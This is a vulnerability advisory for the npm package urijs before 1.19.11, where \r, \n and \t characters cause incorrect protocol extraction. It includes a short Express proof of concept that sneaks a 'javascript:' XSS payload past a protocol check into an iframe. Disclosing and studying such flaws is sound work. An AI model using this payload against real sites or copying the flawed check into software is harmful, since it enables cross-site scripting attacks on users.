GHSA-3vjf-82ff-p4r3

Suggest an improvement
Source
https://github.com/advisories/GHSA-3vjf-82ff-p4r3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-3vjf-82ff-p4r3/GHSA-3vjf-82ff-p4r3.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-3vjf-82ff-p4r3
Aliases
Published
2022-04-06T00:01:31Z
Modified
2023-11-01T04:57:19.732152Z
Severity
  • 7.2 (High) CVSS_V3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N CVSS Calculator
Summary
Incorrect protocol extraction via \r, \n and \t characters
Details

\r, \n and \t characters in user-input URLs can potentially lead to incorrect protocol extraction when using npm package urijs prior to version 1.19.11.

This can lead to XSS when the module is used to prevent passing in malicious javascript: links into HTML or Javascript (see following example):

const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000

input = "ja\r\nvascript:alert(1)"
url = parse(input)

console.log(url)

app.get('/', (req, res) => {
 if (url.protocol !== "javascript:") {res.send("<iframe src=\'" + input + "\'>CLICK ME!</iframe>")}
})

app.listen(port, () => {
 console.log(`Example app listening on port ${port}`)
})
Database specific 
{
    "github_reviewed": true,
    "nvd_published_at": "2022-04-05T15:15:00Z",
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-20"
    ],
    "github_reviewed_at": "2022-04-07T15:45:58Z"
}
References

Affected packages

npm / urijs

Package

Name
urijs
View open source insights on deps.dev
Purl
pkg:npm/urijs

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.19.11

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-3vjf-82ff-p4r3/GHSA-3vjf-82ff-p4r3.json"